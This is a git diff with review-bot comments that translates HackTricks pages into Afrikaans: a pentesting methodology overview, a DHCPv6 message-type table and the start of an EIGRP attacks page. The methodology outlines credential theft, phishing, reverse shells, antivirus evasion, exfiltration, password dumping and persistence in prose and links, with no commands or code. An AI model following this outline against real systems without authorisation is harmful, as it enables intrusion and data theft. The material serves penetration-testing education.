* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin verdien belonings tot **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
## Pentesting Methodology
|
||||
## Pentesting Metodologie
|
||||
|
||||
<figure><img src="../.gitbook/assets/HACKTRICKS-logo.svg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
_Hacktricks logos designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
|
||||
_Hacktricks-logo's ontwerp deur_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
|
||||
|
||||
### 0- Physical Attacks
|
||||
### 0- Fisiese Aanvalle
|
||||
|
||||
Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../physical-attacks/physical-attacks.md) and others about [**escaping from GUI applications**](../physical-attacks/escaping-from-gui-applications/).
|
||||
Het jy **fisiese toegang** tot die masjien wat jy wil aanval? Jy moet 'n paar [**truuks oor fisiese aanvalle**](../physical-attacks/physical-attacks.md) en ander oor [**ontsnapping uit GUI-toepassings**](../physical-attacks/escaping-from-gui-applications/) lees.
|
||||
|
||||
### 1 - [Discovering hosts inside the network ](pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/)
|
||||
### 1 - [Ontdekking van gasheer binne die netwerk](pentesting-network/#discovering-hosts)/ [Ontdekking van bates van die maatskappy](external-recon-methodology/)
|
||||
|
||||
**Depending** if the **test** you are perform is an **internal or external test** you may be interested on finding **hosts inside the company network** (internal test) or **finding assets of the company on the internet** (external test).
|
||||
**Afhanklik** van of die **toets** wat jy uitvoer 'n **interne of eksterne toets** is, mag jy belangstel om **gasheerders binne die maatskappy se netwerk** (interne toets) of **bates van die maatskappy op die internet** (eksterne toets) te vind.
|
||||
|
||||
{% hint style="info" %}
|
||||
Note that if you are performing an external test, once you manage to obtain access to the internal network of the company you should re-start this guide.
|
||||
Let daarop dat as jy 'n eksterne toets uitvoer, sodra jy toegang tot die interne netwerk van die maatskappy verkry, moet jy hierdie gids herbegin.
|
||||
{% endhint %}
|
||||
|
||||
### **2-** [**Having Fun with the network**](pentesting-network/) **(Internal)**
|
||||
### **2-** [**Pret hê met die netwerk**](pentesting-network/) **(Intern)**
|
||||
|
||||
**This section only applies if you are performing an internal test.**\
|
||||
Before attacking a host maybe you prefer to **steal some credentials** **from the network** or **sniff** some **data** to learn **passively/actively(MitM)** what can you find inside the network. You can read [**Pentesting Network**](pentesting-network/#sniffing).
|
||||
**Hierdie afdeling is slegs van toepassing as jy 'n interne toets uitvoer.**\
|
||||
Voordat jy 'n gasheer aanval, verkies jy miskien om **sekere legitimasie-inligting** **uit die netwerk** te **steel** of **data** te **sniff** om passief/aktief (MitM) te leer wat jy binne die netwerk kan vind. Jy kan [**Pentesting Network**](pentesting-network/#sniffing) lees.
|
||||
|
||||
### 3- [Port Scan - Service discovery](pentesting-network/#scanning-hosts)
|
||||
### 3- [Poortskandering - Diensontdekking](pentesting-network/#scanning-hosts)
|
||||
|
||||
The first thing to do when **looking for vulnerabilities in a host** is to know which **services are running** in which ports. Let's see the[ **basic tools to scan ports of hosts**](pentesting-network/#scanning-hosts).
|
||||
Die eerste ding wat jy moet doen wanneer jy **kwesbaarhede in 'n gasheer soek**, is om te weet watter **dienste op watter poorte loop**. Kom ons kyk na die [**basiese gereedskap om poorte van gasheerders te skandeer**](pentesting-network/#scanning-hosts).
|
||||
|
||||
### **4-** [Searching service version exploits](search-exploits.md)
|
||||
### **4-** [Soek diensweergawe-exploits](search-exploits.md)
|
||||
|
||||
Once you know which services are running, and maybe their version, you have to **search for known vulnerabilities**. Maybe you get lucky and there is a exploit to give you a shell...
|
||||
Sodra jy weet watter dienste loop, en dalk hul weergawe, moet jy **soek na bekende kwesbaarhede**. Dalk het jy geluk en daar is 'n exploot wat jou 'n skulpskoot kan gee...
|
||||
|
||||
### **5-** Pentesting Services
|
||||
### **5-** Pentesting-dienste
|
||||
|
||||
If there isn't any fancy exploit for any running service, you should look for **common misconfigurations in each service running.**
|
||||
As daar geen fantastiese exploot vir enige lopende diens is nie, moet jy kyk vir **algemene verkeerde konfigurasies in elke lopende diens**.
|
||||
|
||||
**Inside this book you will find a guide to pentest the most common services** (and others that aren't so common)**. Please, search in the left index the** _**PENTESTING**_ **section** (the services are ordered by their default ports).
|
||||
**Binne hierdie boek sal jy 'n gids vind om die mees algemene dienste te pentest** (en ander wat nie so algemeen is nie)**. Soek asseblief in die linkerindeks die** _**PENTESTING**_ **afdeling** (die dienste is gerangskik volgens hul verstekpoorte).
|
||||
|
||||
**I want to make a special mention of the** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **part (as it is the most extensive one).**\
|
||||
Also, a small guide on how to[ **find known vulnerabilities in software**](search-exploits.md) can be found here.
|
||||
**Ek wil graag 'n spesiale vermelding maak van die** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **gedeelte (omdat dit die mees omvattende is).**\
|
||||
'n Klein gids oor hoe om [**bekende kwesbaarhede in sagteware te vind**](search-exploits.md) kan hier gevind word.
|
||||
|
||||
**If your service is not inside the index, search in Google** for other tutorials and **let me know if you want me to add it.** If you **can't find anything** in Google, perform your **own blind pentesting**, you could start by **connecting to the service, fuzzing it and reading the responses** (if any).
|
||||
**As jou diens nie in die indeks is nie, soek in Google** vir ander tutoriale en **laat weet my as jy wil hê ek moet dit byvoeg.** As jy **niks kan vind** in Google nie, voer jou **eie blinde pentesting** uit, jy kan begin deur **met die diens te verbind, dit te fuzz en die antwoorde te lees** (as daar enige is).
|
||||
|
||||
#### 5.1 Automatic Tools
|
||||
#### 5.1 Outomatiese Gereedskap
|
||||
|
||||
There are also several tools that can perform **automatic vulnerabilities assessments**. **I would recommend you to try** [**Legion**](https://github.com/carlospolop/legion)**, which is the tool that I have created and it's based on the notes about pentesting services that you can find in this book.**
|
||||
Daar is ook verskeie gereedskap wat **outomatiese kwesbaarheidsassesserings** kan uitvoer. **Ek sal aanbeveel dat jy** [**Legion**](https://github.com/carlospolop/legion)** probeer, wat die gereedskap is wat ek geskep het en gebaseer is op die notas oor die pentesting van dienste wat jy in hierdie boek kan vind.**
|
||||
|
||||
#### **5.2 Brute-Forcing services**
|
||||
#### **5.2 Brute-Force-dienste**
|
||||
|
||||
In some scenarios a **Brute-Force** could be useful to **compromise** a **service**. [**Find here a CheatSheet of different services brute forcing**](brute-force.md)**.**
|
||||
In sommige scenario's kan 'n **Brute-Force** nuttig wees om 'n **diens** te **kompromitteer**. [**Vind hier 'n Spiekbrief van verskillende dienste wat Brute-Force gebruik**](brute-force.md)**.**
|
||||
|
||||
<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\
|
||||
**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin verdien belonings tot **$100,000**!\\
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
### 6- [Phishing](phishing-methodology/)
|
||||
|
||||
If at this point you haven't found any interesting vulnerability you **may need to try some phishing** in order to get inside the network. You can read my phishing methodology [here](phishing-methodology/):
|
||||
As jy op hierdie punt nog geen interessante kwesbaarheid gevind het nie, **moet jy dalk 'n bietjie phishing probeer** om toegang tot die netwerk te kry. Jy kan my phishing-metodologie [hier](phishing-methodology/) lees:
|
||||
|
||||
### **7-** [**Getting Shell**](shells/)
|
||||
### **7-** [**Kry 'n Skulpskoot**](shells/)
|
||||
|
||||
Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/).
|
||||
Op een of ander manier moet jy 'n **manier gevind het om kode uit te voer** op die slagoffer. Dan sou 'n lys van moontlike gereedskap binne die stelsel wat jy kan gebruik om 'n omgekeerde skulpskoot te kry, baie nuttig wees](shells/).
|
||||
|
||||
Specially in Windows you could need some help to **avoid antiviruses**: [**Check this page**](../windows-hardening/av-bypass.md)**.**\\
|
||||
Veral in Windows mag jy dalk hulp nodig hê om **antivirusprogramme te vermy**: [**Kyk na hierdie bladsy**](../windows-hardening/av-bypass.md)**.**\\
|
||||
|
||||
### 8- Inside
|
||||
### 8- Binne
|
||||
|
||||
If you have troubles with the shell, you can find here a small **compilation of the most useful commands** for pentesters:
|
||||
As jy probleme het met die skulpskoot, kan jy hier 'n klein **samestelling van die mees nuttige opdragte** vir pentesters vind:
|
||||
|
||||
* [**Linux**](../linux-hardening/useful-linux-commands/)
|
||||
* [**Windows (CMD)**](../windows-hardening/basic-cmd-for-pentesters.md)
|
||||
* [**Winodows (PS)**](../windows-hardening/basic-powershell-for-pentesters/)
|
||||
* [**Windows (PS)**](../windows-hardening/basic-powershell-for-pentesters/)
|
||||
### **9 -** [**Uitlekking**](exfiltration.md)
|
||||
|
||||
### **9 -** [**Exfiltration**](exfiltration.md)
|
||||
Jy sal waarskynlik nodig hê om **data uit die slagoffer te onttrek** of selfs iets **in te voer** (soos voorregverhoging skripte). **Hier het jy 'n** [**pos oor algemene gereedskap wat jy met hierdie doeleindes kan gebruik**](exfiltration.md)**.**
|
||||
|
||||
You will probably need to **extract some data from the victim** or even **introduce something** (like privilege escalation scripts). **Here you have a** [**post about common tools that you can use with these purposes**](exfiltration.md)**.**
|
||||
### **10- Voorregverhoging**
|
||||
|
||||
### **10- Privilege Escalation**
|
||||
#### **10.1- Plaaslike Voorregverhoging**
|
||||
|
||||
#### **10.1- Local Privesc**
|
||||
As jy **nie root/Administrator** binne die boks is nie, moet jy 'n manier vind om **voorregte te verhoog**.\
|
||||
Hier kan jy 'n **gids vind om voorregte plaaslik te verhoog in** [**Linux**](../linux-hardening/privilege-escalation/) **en in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\
|
||||
Jy moet ook hierdie bladsye oor hoe **Windows werk** nagaan:
|
||||
|
||||
If you are **not root/Administrator** inside the box, you should find a way to **escalate privileges.**\
|
||||
Here you can find a **guide to escalate privileges locally in** [**Linux**](../linux-hardening/privilege-escalation/) **and in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\
|
||||
You should also check this pages about how does **Windows work**:
|
||||
* [**Verifikasie, Legitieme Inligting, Token-voorregte en UAC**](../windows-hardening/authentication-credentials-uac-and-efs.md)
|
||||
* Hoe werk [**NTLM**](../windows-hardening/ntlm/)
|
||||
* Hoe om [**legitieme inligting te steel**](broken-reference/) in Windows
|
||||
* 'n Paar truuks oor [_**Aktiewe Gids**_](../windows-hardening/active-directory-methodology/)
|
||||
|
||||
* [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/authentication-credentials-uac-and-efs.md)
|
||||
* How does [**NTLM works**](../windows-hardening/ntlm/)
|
||||
* How to [**steal credentials**](broken-reference/) in Windows
|
||||
* Some tricks about [_**Active Directory**_](../windows-hardening/active-directory-methodology/)
|
||||
**Moenie vergeet om die beste gereedskap om Windows en Linux plaaslike Voorregverhoging-paaie op te som nie:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
|
||||
|
||||
**Don't forget to checkout the best tools to enumerate Windows and Linux local Privilege Escalation paths:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
|
||||
#### **10.2- Domein Voorregverhoging**
|
||||
|
||||
#### **10.2- Domain Privesc**
|
||||
|
||||
Here you can find a [**methodology explaining the most common actions to enumerate, escalate privileges and persist on an Active Directory**](../windows-hardening/active-directory-methodology/). Even if this is just a subsection of a section, this process could be **extremely delicate** on a Pentesting/Red Team assignment.
|
||||
Hier kan jy 'n [**metodologie vind wat die mees algemene aksies verduidelik om te ondersoek, voorregte te verhoog en volhardend te wees in 'n Aktiewe Gids**](../windows-hardening/active-directory-methodology/). Selfs al is dit net 'n subafdeling van 'n afdeling, kan hierdie proses **uiters delikaat** wees in 'n Pentesting/Red Team-opdrag.
|
||||
|
||||
### 11 - POST
|
||||
|
||||
#### **11**.1 - Looting
|
||||
#### **11**.1 - Plundering
|
||||
|
||||
Check if you can find more **passwords** inside the host or if you have **access to other machines** with the **privileges** of your **user**.\
|
||||
Find here different ways to [**dump passwords in Windows**](broken-reference/).
|
||||
Kyk of jy meer **wagwoorde** binne die gasheer kan vind of as jy **toegang het tot ander masjiene** met die **voorregte** van jou **gebruiker**.\
|
||||
Vind hier verskillende maniere om [**wagwoorde in Windows te dump**](broken-reference/).
|
||||
|
||||
#### 11.2 - Persistence
|
||||
#### 11.2 - Volharding
|
||||
|
||||
**Use 2 o 3 different types of persistence mechanism so you won't need to exploit the system again.**\
|
||||
**Here you can find some** [**persistence tricks on active directory**](../windows-hardening/active-directory-methodology/#persistence)**.**
|
||||
**Gebruik 2 of 3 verskillende tipes volhardingsmeganismes sodat jy nie weer die stelsel hoef te benut nie.**\
|
||||
**Hier kan jy 'n paar** [**volhardingstruuks in 'n aktiewe gids vind**](../windows-hardening/active-directory-methodology/#persistence)**.**
|
||||
|
||||
TODO: Complete persistence Post in Windows & Linux 
|
||||
TODO: Voltooi volhardingspos in Windows & Linux 
|
||||
|
||||
### 12 - Pivoting
|
||||
|
||||
With the **gathered credentials** you could have access to other machines, or maybe you need to **discover and scan new hosts** (start the Pentesting Methodology again) inside new networks where your victim is connected.\
|
||||
In this case tunnelling could be necessary. Here you can find [**a post talking about tunnelling**](tunneling-and-port-forwarding.md).\
|
||||
You definitely should also check the post about [Active Directory pentesting Methodology](../windows-hardening/active-directory-methodology/). There you will find cool tricks to move laterally, escalate privileges and dump credentials.\
|
||||
Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be very useful to pivot on Windows environments..
|
||||
Met die **versamelde legitimasie** kan jy toegang hê tot ander masjiene, of miskien moet jy **nuwe gasheer ontdek en skandeer** (begin die Pentesting Metodologie weer) binne nuwe netwerke waar jou slagoffer gekoppel is.\
|
||||
In hierdie geval kan tunnelling nodig wees. Hier kan jy [**'n pos vind wat oor tunnelling praat**](tunneling-and-port-forwarding.md).\
|
||||
Jy moet beslis ook die pos oor [Aktiewe Gids pentesting Metodologie](../windows-hardening/active-directory-methodology/) nagaan. Daar sal jy koel truuks vind om lateraal te beweeg, voorregte te verhoog en legitimasie te dump.\
|
||||
Kyk ook na die bladsy oor [**NTLM**](../windows-hardening/ntlm/), dit kan baie nuttig wees om te pivoteer in Windows-omgewings..
|
||||
|
||||
### MORE
|
||||
### MEER
|
||||
|
||||
#### [Android Applications](../mobile-pentesting/android-app-pentesting/)
|
||||
#### [Android-toepassings](../mobile-pentesting/android-app-pentesting/)
|
||||
|
||||
#### **Exploiting**
|
||||
#### **Uitbuiting**
|
||||
|
||||
* [**Basic Linux Exploiting**](../exploiting/linux-exploiting-basic-esp/)
|
||||
* [**Basic Windows Exploiting**](../exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
|
||||
* [**Basic exploiting tools**](../exploiting/tools/)
|
||||
* [**Basiese Linux-uitbuiting**](../exploiting/linux-exploiting-basic-esp/)
|
||||
* [**Basiese Windows-uitbuiting**](../exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
|
||||
* [**Basiese uitbuitingsgereedskap**](../exploiting/tools/)
|
||||
|
||||
#### [**Basic Python**](python/)
|
||||
#### [**Basiese Python**](python/)
|
||||
|
||||
#### **Crypto tricks**
|
||||
#### **Krypto-truuks**
|
||||
|
||||
* [**ECB**](../cryptography/electronic-code-book-ecb.md)
|
||||
* [**CBC-MAC**](../cryptography/cipher-block-chaining-cbc-mac-priv.md)
|
||||
* [**Padding Oracle**](../cryptography/padding-oracle-priv.md)
|
||||
|
||||
<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien!

{% embed url="https://go.intigriti.com/hacktricks" %}

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.

</details>

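Review bot: the footer boilerplate in this file is translated differently from the same block in the other files of this commit: here `SUBSKRIPSIEPLANNE`, `HackTricks-uitrusting`, `NFT's`, `hacktruuks` and `github-opslag`, while the DHCPv6, EIGRP and GLBP files below use `SUBSCRIPTION PLANS`, `HackTricks swag`, `NFTs`, `hacking-truuks`/`hacktruuks` and `GitHub-opslagplekke`/`github-repos`. Since this block is pasted verbatim at the top and bottom of every page, translate it once and reuse that single version everywhere (or keep the link labels in English so they match the link targets), otherwise every future sync of the template will produce a diff in each file.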
File diff suppressed because it is too large
@ -1,23 +1,21 @@

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.

</details>

### DHCPv6 vs. DHCPv4 Message Types Comparison
A comparative view of DHCPv6 and DHCPv4 message types is presented in the table below:
### Vergelyking van DHCPv6- en DHCPv4-boodskaptipes
'n Vergelykende siening van DHCPv6- en DHCPv4-boodskaptipes word in die tabel hieronder voorgestel:

| DHCPv6 Message Type | DHCPv4 Message Type |
| DHCPv6-boodskaptipe | DHCPv4-boodskaptipe |
|:-------------------|:-------------------|
| Solicit (1) | DHCPDISCOVER |
| Advertise (2) | DHCPOFFER |
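Review bot: the hunk header `@ -1,23 +1,21 @@` says the new side is two lines shorter, yet every visible old line in this hunk has a translated counterpart, so the dropped lines must be blank ones; check that the blank line between `</summary>` and the bullet list survived, because without it GitHub-flavoured markdown treats the bullets as part of the raw HTML block and the list does not render. The Afrikaans table header `| DHCPv6-boodskaptipe | DHCPv4-boodskaptipe |` keeps the same two columns as the unchanged `|:---|:---|` separator row, which is correct.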
@ -26,42 +24,40 @@ A comparative view of DHCPv6 and DHCPv4 message types is presented in the table
| Release (8) | DHCPRELEASE |
| Information-Request (11) | DHCPINFORM |
| Decline (9) | DHCPDECLINE |
| Confirm (4) | none |
| Confirm (4) | geen |
| Reconfigure (10) | DHCPFORCERENEW |
| Relay-Forw (12), Relay-Reply (13) | none |
| Relay-Forw (12), Relay-Reply (13) | geen |

**Detailed Explanation of DHCPv6 Message Types:**
**Gedetailleerde verduideliking van DHCPv6-boodskaptipes:**

1. **Solicit (1)**: Initiated by a DHCPv6 client to find available servers.
2. **Advertise (2)**: Sent by servers in response to a Solicit, indicating availability for DHCP service.
3. **Request (3)**: Clients use this to request IP addresses or prefixes from a specific server.
4. **Confirm (4)**: Used by a client to verify if the assigned addresses are still valid on the network, typically after a network change.
5. **Renew (5)**: Clients send this to the original server to extend address lifetimes or update configurations.
6. **Rebind (6)**: Sent to any server to extend address lifetimes or update configurations, especially when no response is received to a Renew.
7. **Reply (7)**: Servers use this to provide addresses, configuration parameters, or to acknowledge messages like Release or Decline.
8. **Release (8)**: Clients inform the server to stop using one or more assigned addresses.
9. **Decline (9)**: Sent by clients to report that assigned addresses are in conflict on the network.
10. **Reconfigure (10)**: Servers prompt clients to initiate transactions for new or updated configurations.
11. **Information-Request (11)**: Clients request configuration parameters without IP address assignment.
12. **Relay-Forw (12)**: Relay agents forward messages to servers.
13. **Relay-Repl (13)**: Servers reply to relay agents, who then deliver the message to the client.
1. **Solicit (1)**: Geïnisieer deur 'n DHCPv6-kliënt om beskikbare bedieners te vind.
2. **Advertise (2)**: Deur bedieners gestuur as reaksie op 'n Solicit, wat beskikbaarheid vir DHCP-diens aandui.
3. **Request (3)**: Kliënte gebruik dit om IP-adresse of voorvoegsels van 'n spesifieke bediener aan te vra.
4. **Confirm (4)**: Gebruik deur 'n kliënt om te verifieer of die toegewysde adresse nog geldig is op die netwerk, tipies na 'n netwerkverandering.
5. **Renew (5)**: Kliënte stuur dit na die oorspronklike bediener om adreslewentye te verleng of konfigurasies op te dateer.
6. **Rebind (6)**: Gestuur na enige bediener om adreslewentye te verleng of konfigurasies op te dateer, veral wanneer geen reaksie ontvang word op 'n Renew nie.
7. **Reply (7)**: Bedieners gebruik dit om adresse, konfigurasieparameters te voorsien, of om boodskappe soos Release of Decline te erken.
8. **Release (8)**: Kliënte stel die bediener in kennis om een of meer toegewysde adresse te stop gebruik.
9. **Decline (9)**: Gestuur deur kliënte om te rapporteer dat toegewysde adresse in konflik is op die netwerk.
10. **Reconfigure (10)**: Bedieners moedig kliënte aan om transaksies vir nuwe of opgedateerde konfigurasies te begin.
11. **Information-Request (11)**: Kliënte vra konfigurasieparameters sonder IP-adres toewysing.
12. **Relay-Forw (12)**: Relay-agente stuur boodskappe na bedieners.
13. **Relay-Repl (13)**: Bedieners antwoord op relay-agente, wat dan die boodskap aan die kliënt aflewer.

## References
## Verwysings
* [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages)

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.

</details>

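Review bot: item 13 of the list still reads `Relay-Repl (13)` on both the old and the new side while the table row above it says `Relay-Reply (13)`; since the translation rewrote both lines, make them agree now (RFC 8415 names the two messages Relay-forward and Relay-reply). Two translated items also read badly: `om een of meer toegewysde adresse te stop gebruik` (item 8) should be `om op te hou om een of meer toegewysde adresse te gebruik`, and `sonder IP-adres toewysing` (item 11) should be one word, `IP-adrestoewysing`. In item 10, `moedig kliënte aan` ("encourage") understates Reconfigure, which is a server instruction; `instrueer kliënte` is closer to "prompt".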
@ -1,86 +1,86 @@
# EIGRP Attacks
# EIGRP Aanvalle

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
